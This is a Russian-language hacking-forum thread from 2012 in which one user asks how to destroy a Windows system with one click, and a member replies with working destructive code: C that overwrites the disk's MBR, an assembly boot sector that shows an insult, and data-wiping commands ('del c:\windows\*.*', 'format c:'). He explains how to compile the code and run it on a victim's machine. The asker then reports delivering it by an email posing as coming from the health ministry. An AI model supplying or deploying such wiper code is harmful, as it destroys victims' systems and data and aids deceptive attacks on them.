Информационная Безопасность. Аудит Безопасности


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - флэшка для удаления системного раздела
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Администрирование / Windows RSS подписка на сообщения с форума Subscribe
Администрирование Microsoft Windows (9x,XP,2003,Vista)

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 4297
флэшка для удаления системного раздела
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
k86-1


Novice
# | Сообщение добавлено 28.05.2012 16:13:53
всем привет!
 
у меня вопрос:
существует ли в природе софтина,вирус,команда бат или хоть что нибудь что может буквально одним кликом уничтожить систему из под которой оно и запущено?
или автоматом при запуске винды или автозапуском с флэхи?
Сказать спасибо Ответить Цитировать

codemaster




Platinum Member
# | Сообщение добавлено 28.05.2012 19:19:12
Отредактировано 28.05.2012 19:24:23 by codemaster
ну например программа на си:
C++

HANDLE hFile;
void *stub;
DWORD readed;
stub=malloc(512);
memset(stub,0,512);
hFile=CreateFile("\\\\.\\PhysicalDrive0", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
WriteFile(hFile,stub,512,&readed,NULL);
CloseHandle(hFile);
 
при следующей загрузке биос не сможет найти MBR на жоском диске, но опытный юзер пропишет в консоле восстановления венды fixmbr и все станет как было. по крайней мере должно :D
 
более чоткие кодеры сначала пишут код для бутсектора на ASM, потом снимают с нее дамп и пишут в мбр. получается намного веселее. например:
 
Text

USE16
;------------ загрузочный сектор ---------------------
        org     7C00h
EntryPoint:
        mov     ax, cs              ;сегмент кода
        cli               ; запрещаем прерывания 
mov     ss, ax              ;зададим  сегмент стэка, кода, данных - все в одном месте
        mov     ds, ax              
        mov     es, ax              
        mov     sp, EntryPoint       ; зададим адрес старта программы как вершина стека
        sti               ; разрешаем прерывания т.к. уже можно нормально с ними работать
        cld               ; ставим флаг направления
        mov     ax, 3                ; 80x25
        int     10h
        xor     dx, dx              ; X = 0, Y = 0
        mov     bx, 15              ; цвет
        mov     ax, 1301h    ; AL = 1  Передвигать курсор , AH = 13h Вывод строки
        mov     bp, BootMsg  ; адрес сообщения
        mov     cx, BootMsgEnd - BootMsg
        int     10h    ; выводим текст
xor     ax, ax              ; AH = 0 (ожидать нажатие)
        int     16h    ; ждем нажатие клавиши
        jmp     0FFFFh:0000h ; reboot
 
;------------ данные загрузочного сектора--------------
BootMsg db "владелец компа гей и лох :D"
BootMsgEnd:
 
TIMES   510-($-$$) DB 0    ; Заполняем оставшееся пространство от 500 байт нулями
DW      0AA55h                        ; Сигнатура конца загрузочного сектора
 
 

существуют более простые методы убить форточки, но они не интересные. например в командной строке пропиши:

del c:\windows\*.*
или

format c:\ /fs:NTFS /q

 
Сказать спасибо Ответить Цитировать

k86-1


Novice
# | Сообщение добавлено 29.05.2012 03:15:13
хм...вариант №1 сохраняем,придаем расширение дописываем авторан и все?
это как защита от совсем дерева.
это дерево не запустит мбр
Сказать спасибо Ответить Цитировать

codemaster




Platinum Member
# | Сообщение добавлено 29.05.2012 07:23:08
нет. создаем программу на си, вставляем код, компилируем, бинарник запускаем у жертвы на компьютере.
если второй вариант, то компилируем mbr-обираз fasm-ом, снимаем HEX-дамп, и переписываем программу на си чтобы она записывала образ в mbr, вместо того чтобы обнулять его
 
Сказать спасибо Ответить Цитировать

k86-1


Novice
# | Сообщение добавлено 29.05.2012 15:32:44
jj jf  i7uu,;
!!!!
спасибо!
пациент даже не мучался-с автораном не заморачивался,послал письмо от минздрава.
он же авторитет.
дерево все сделало своими руками.
спасибо.
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • В darknet сливают данные 100 000 российских банковских карт
  • Вирус Escobar ворует коды двухфакторной аутентификации из Google ...
  • DeadBolt использует уязвимость, исправленную в декабре
  • Почти миллион WordPress-сайтов в опасности из-за уязвимости в поп...
  • Шифровальщик DeadBolt взломал 3600 NAS. Qnap устанавливает обновл...
  • Банковский троян Chaes устанавливает вредоносные расширения для C...
  • Взломана платформа Qubit Finance, хакеры похитили 80 млн долларов
  • Арест участников REvil взволновал других преступников
  • Обнаружена malware MoonBounce, внедряющаяся в UEFI
  • Администратор кардерского форума UniCC и участник хак-группы The ...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Предложения работы » Взлом авторизации CRM
  • Разное / Предложения работы » взломать сайт и выграть электронную жеребьёвку
  • Разное / Предложения работы » разблокировать сбер аккаунт
  • Разное / Болталка » Re: Форум жив?
  • Разное / Болталка » Форум жив?
  • Разное / Болталка » С Новым 2022 Годом!
  • Взлом и безопасность / Программы » Re: Hasp ключ для ABC-4
  • Портал / Отзывы и предложения » Предлагаем партнерство вашему форуму.
  • Разное / Предложения работы » взлом почты
  • Разное / Куплю, приму в дар » Покупка аккаунтов Uphold

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}